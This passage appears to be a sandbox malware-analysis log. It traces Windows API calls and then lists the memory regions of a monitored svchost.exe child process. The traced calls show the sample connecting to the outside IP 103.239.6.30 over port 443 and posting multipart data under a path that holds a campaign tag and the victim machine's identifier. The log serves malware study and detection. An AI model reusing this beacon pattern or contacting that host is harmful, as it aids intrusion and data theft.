RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x4) returned 0x617410 [0187.605] lstrcpyA (in: lpString1=0x617410, lpString2="*/*" | out: lpString1="*/*") returned="*/*" [0187.605] lstrlenA (lpString="en") returned 2 [0187.605] GetProcessHeap () returned 0x560000 [0187.605] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x3) returned 0x617420 [0187.605] lstrcpyA (in: lpString1=0x617420, lpString2="en" | out: lpString1="en") returned="en" [0187.605] GetProcessHeap () returned 0x560000 [0187.605] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x6) returned 0x617390 [0187.605] GetProcessHeap () returned 0x560000 [0187.605] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x617350, Size=0x6) returned 0x6172a0 [0187.605] GetProcessHeap () returned 0x560000 [0187.605] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617390 | out: hHeap=0x560000) returned 1 [0187.605] GetProcessHeap () returned 0x560000 [0187.605] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x1f) returned 0x624320 [0187.605] GetProcessHeap () returned 0x560000 [0187.605] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x1f) returned 0x624380 [0187.605] GetProcessHeap () returned 0x560000 [0187.605] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x624380, Size=0x6f) returned 0x6553b0 [0187.605] GetProcessHeap () returned 0x560000 [0187.606] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x617470, Size=0x38) returned 0x6236d0 [0187.606] GetProcessHeap () returned 0x560000 [0187.606] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x6553b0 | out: hHeap=0x560000) returned 1 [0187.606] GetProcessHeap () returned 0x560000 [0187.606] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x624320 | out: hHeap=0x560000) returned 1 [0187.606] GetProcAddress (hModule=0x7ffb19d70000, lpProcName="InternetOpenA") returned 0x7ffb19daa3b0 [0187.606] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", dwAccessType=0x1, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0187.710] GetProcAddress (hModule=0x7ffb19d70000, lpProcName="InternetConnectA") returned 0x7ffb19ea6d40 [0187.711] InternetConnectA (hInternet=0xcc0004, lpszServerName="103.239.6.30", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0187.711] GetProcessHeap () returned 0x560000 [0187.711] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x5) returned 0x6173d0 [0187.711] GetProcessHeap () returned 0x560000 [0187.711] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x9) returned 0x6173e0 [0187.711] GetProcAddress (hModule=0x7ffb19d70000, lpProcName="HttpOpenRequestA") returned 0x7ffb19ed20a0 [0187.711] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="POST", lpszObjectName="tot153/XC64ZB_W10010586.FDB33F77971735B3BB3BB3B3B33B3B93/81/", lpszVersion="HTTP/1.1", lpszReferrer="", lplpszAcceptTypes=0x0, dwFlags=0x0, dwContext=0x0) returned 0xcc000c [0187.712] GetProcessHeap () returned 0x560000 [0187.712] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x6173e0 | out: hHeap=0x560000) returned 1 [0187.712] GetProcessHeap () returned 0x560000 [0187.712] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x14) returned 0x6246a0 [0187.712] GetProcessHeap () returned 0x560000 [0187.712] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x3) returned 0x6172e0 [0187.712] GetProcessHeap () returned 0x560000 [0187.712] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xf) returned 0x6173e0 [0187.712] GetProcessHeap () returned 0x560000 [0187.712] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x3) returned 0x617290 [0187.712] GetProcessHeap () returned 0x560000 [0187.712] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x9) returned 0x6172f0 [0187.712] GetProcessHeap () returned 0x560000 [0187.712] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x9) returned 0x6172b0 [0187.712] GetProcessHeap () returned 0x560000 [0187.712] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x6172b0, Size=0x17) returned 0x6246e0 [0187.712] GetProcessHeap () returned 0x560000 [0187.712] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xc) returned 0x6172b0 [0187.713] GetProcessHeap () returned 0x560000 [0187.713] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x6172b0, Size=0x1b) returned 0x624480 [0187.713] GetProcessHeap () returned 0x560000 [0187.713] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xe) returned 0x6172b0 [0187.713] GetProcessHeap () returned 0x560000 [0187.713] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x6172b0, Size=0x37) returned 0x6231d0 [0187.713] GetProcessHeap () returned 0x560000 [0187.713] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x1c) returned 0x624760 [0187.713] GetProcessHeap () returned 0x560000 [0187.713] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x624760, Size=0xa5) returned 0x637810 [0187.713] GetProcessHeap () returned 0x560000 [0187.713] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x53) returned 0x6196b0 [0187.713] GetProcessHeap () returned 0x560000 [0187.713] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x6196b0, Size=0xa9) returned 0x6378d0 [0187.713] GetProcessHeap () returned 0x560000 [0187.713] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x55) returned 0x6196b0 [0187.713] GetProcessHeap () returned 0x560000 [0187.713] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x6196b0, Size=0xcf) returned 0x637990 [0187.713] GetProcessHeap () returned 0x560000 [0187.713] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x6378d0 | out: hHeap=0x560000) returned 1 [0187.713] GetProcessHeap () returned 0x560000 [0187.713] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x637810 | out: hHeap=0x560000) returned 1 [0187.713] GetProcessHeap () returned 0x560000 [0187.713] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x6231d0 | out: hHeap=0x560000) returned 1 [0187.713] GetProcessHeap () returned 0x560000 [0187.713] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x624480 | out: hHeap=0x560000) returned 1 [0187.713] GetProcessHeap () returned 0x560000 [0187.713] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x6246e0 | out: hHeap=0x560000) returned 1 [0187.713] GetProcessHeap () returned 0x560000 [0187.713] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x6172f0 | out: hHeap=0x560000) returned 1 [0187.713] GetProcessHeap () returned 0x560000 [0187.713] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617290 | out: hHeap=0x560000) returned 1 [0187.713] GetProcessHeap () returned 0x560000 [0187.713] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x6173e0 | out: hHeap=0x560000) returned 1 [0187.713] GetProcessHeap () returned 0x560000 [0187.713] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x6172e0 | out: hHeap=0x560000) returned 1 [0187.713] GetProcessHeap () returned 0x560000 [0187.714] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x6246a0 | out: hHeap=0x560000) returned 1 [0187.714] GetProcAddress (hModule=0x7ffb19d70000, lpProcName="HttpAddRequestHeadersA") returned 0x7ffb19dc48b0 [0187.714] HttpAddRequestHeadersA (hRequest=0xcc000c, lpszHeaders="Accept: */*\r\nContent-Type: multipart/form-data; boundary=---------CKIZIKHWATNYNRHY\r\nConnection: Close\r\n", dwHeadersLength=0x67, dwModifiers=0xa0000000) returned 1 [0187.714] GetProcAddress (hModule=0x7ffb19d70000, lpProcName="HttpSendRequestExA") returned 0x7ffb19d7e210 [0187.714] HttpSendRequestExA (in: hRequest=0xcc000c, lpBuffersIn=0x231ea50, lpBuffersOut=0x0, dwFlags=0x0, dwContext=0x0 | out: lpBuffersOut=0x0) returned 1 [0188.572] GetProcessHeap () returned 0x560000 [0188.572] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x1001) returned 0x67c040 [0188.573] GetProcAddress (hModule=0x7ffb19d70000, lpProcName="InternetWriteFile") returned 0x7ffb19e22ae0 [0188.573] InternetWriteFile (in: hFile=0xcc000c, lpBuffer=0x6108c0*, dwNumberOfBytesToWrite=0x104, lpdwNumberOfBytesWritten=0x231e8e4 | out: lpBuffer=0x6108c0*, lpdwNumberOfBytesWritten=0x231e8e4*=0x104) returned 1 [0188.573] GetProcAddress (hModule=0x7ffb19d70000, lpProcName="HttpEndRequestA") returned 0x7ffb19e38eb0 [0188.573] HttpEndRequestA (hRequest=0xcc000c, lpBuffersOut=0x0, dwFlags=0x0, dwContext=0x0) Thread: id = 136 os_tid = 0xbb0 Thread: id = 137 os_tid = 0x8fc Thread: id = 138 os_tid = 0xe98 Thread: id = 139 os_tid = 0xb08 Thread: id = 140 os_tid = 0xe1c Process: id = "8" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x69ae7000" os_pid = "0x2f8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x750" cmd_line = "C:\\Windows\\system32\\svchost.exe" cur_dir = "C:\\Windows\\system32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f142" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1825 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1826 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1827 start_va = 0x50000 end_va = 0xcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 1828 start_va = 0xd0000 end_va = 0xd3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 1829 start_va = 0xe0000 end_va = 0xe0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 1830 start_va = 0xf0000 end_va = 0xf1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 1831 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 1832 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1833 start_va = 0x7df5fffc0000 end_va = 0x7df5fffe2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5fffc0000" filename = "" Region: id = 1834 start_va = 0x7df5ffff0000 end_va = 0x7ff5fffeffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffff0000" filename = "" Region: id = 1835 start_va = 0x7ff6bac60000 end_va = 0x7ff6bac6cfff monitored = 0 entry_point = 0x7ff6bac63980 region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe") Region: id = 1836 start_va = 0x7ffb28b00000 end_va = 0x7ffb28cc0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1837 start_va = 0x100000 end_va = 0x100fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 1838 start_va = 0x110000 end_va = 0x110fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 1839 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1840 start_va = 0x530000 end_va = 0x536fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 1841 start_va = 0x600000 end_va = 0x6fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000600000" filename = "" Region: id = 1842 start_va = 0x7df5ffec0000 end_va = 0x7df5fffbffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffec0000" filename = "" Region: id = 1843 start_va = 0x7ffb251b0000 end_va = 0x7ffb25397fff monitored = 0 entry_point = 0x7ffb251dba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1844 start_va = 0x7ffb26230000 end_va = 0x7ffb262dcfff monitored = 0 entry_point = 0x7ffb262481a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1845 start_va = 0x120000 end_va = 0x1ddfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1846 start_va = 0x7ffb27d40000 end_va = 0x7ffb27d9afff monitored = 0 entry_point = 0x7ffb27d538b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1847 start_va = 0x7ffb26590000 end_va = 0x7ffb266abfff monitored = 0 entry_point = 0x7ffb265d02b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1848 start_va = 0x400000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 1849 start_va = 0x7ffb242c0000 end_va = 0x7ffb243b3fff monitored = 0 entry_point = 0x7ffb242ca960 region_type = mapped_file name = "ucrtbase.dll" filename = "\\Windows\\System32\\ucrtbase.dll" (normalized: "c:\\windows\\system32\\ucrtbase.dll") Region: id = 1850 start_va = 0x180000000 end_va = 0x180009fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000180000000" filename = "" Region: id = 1851 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1852 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1853 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1854 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1855 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1856 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1857 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1858 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1859 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1860 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1861 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1862 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1863 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1864 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1865 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1866 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1867 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1868 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1869 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1870 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1871 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1872 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1873 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1874 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1875 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1876 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1877 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1878 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1879 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1880 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1881 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1882 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1883 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1884 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1885 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1886 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1887 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1888 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1889 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1890 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1891 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1892 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1893 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1894 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1895 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1896 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1897 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1898 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1899 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1900 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1901 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1902 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1903 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1904 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1905 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1906 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1907 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1908 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1909 start_va = 0x7ffb26090000 end_va = 0x7ffb261e5fff monitored = 0 entry_point = 0x7ffb2609a8d0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1910 start_va = 0x7ffb25f00000 end_va = 0x7ffb26085fff monitored = 0 entry_point = 0x7ffb25f4ffc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1911 start_va = 0x480000 end_va = 0x4b8fff monitored = 0 entry_point = 0x4812f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1912 start_va = 0x700000 end_va = 0x887fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000700000" filename = "" Region: id = 1913 start_va = 0x7ffb261f0000 end_va = 0x7ffb2622afff monitored = 0 entry_point = 0x7ffb261f12f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1914 start_va = 0x890000 end_va = 0xa10fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000890000" filename = "" Region: id = 1915 start_va = 0xa20000 end_va = 0x1e1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a20000" filename = "" Region: id = 1916 start_va = 0x1f0000 end_va = 0x1f1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 1917 start_va = 0x480000 end_va = 0x480fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000480000" filename = "" Region: id = 1918 start_va = 0x490000 end_va = 0x490fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000490000" filename = "" Region: id = 1919 start_va = 0x4a0000 end_va = 0x4a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004a0000" filename = "" Region: id = 1920 start_va = 0x1e20000 end_va = 0x221afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e20000" filename = "" Region: id = 1921 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1922 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1923 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1924 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1925 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1926 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1927 start_va = 0x7ffb28a50000 end_va = 0x7ffb28af6fff monitored = 0 entry_point = 0x7ffb28a658d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1928 start_va = 0x7ffb264f0000 end_va = 0x7ffb2658cfff monitored = 0 entry_point = 0x7ffb264f78a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1929 start_va = 0x2220000 end_va = 0x234cfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002220000" filename = "" Region: id = 1930 start_va = 0x2350000 end_va = 0x254ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002350000" filename = "" Region: id = 1931 start_va = 0x2400000 end_va = 0x24fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002400000" filename = "" Region: id = 1932 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1933 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1934 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1935 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1936 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1937 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1938 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1939 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1940 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1941 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1942 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1943 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 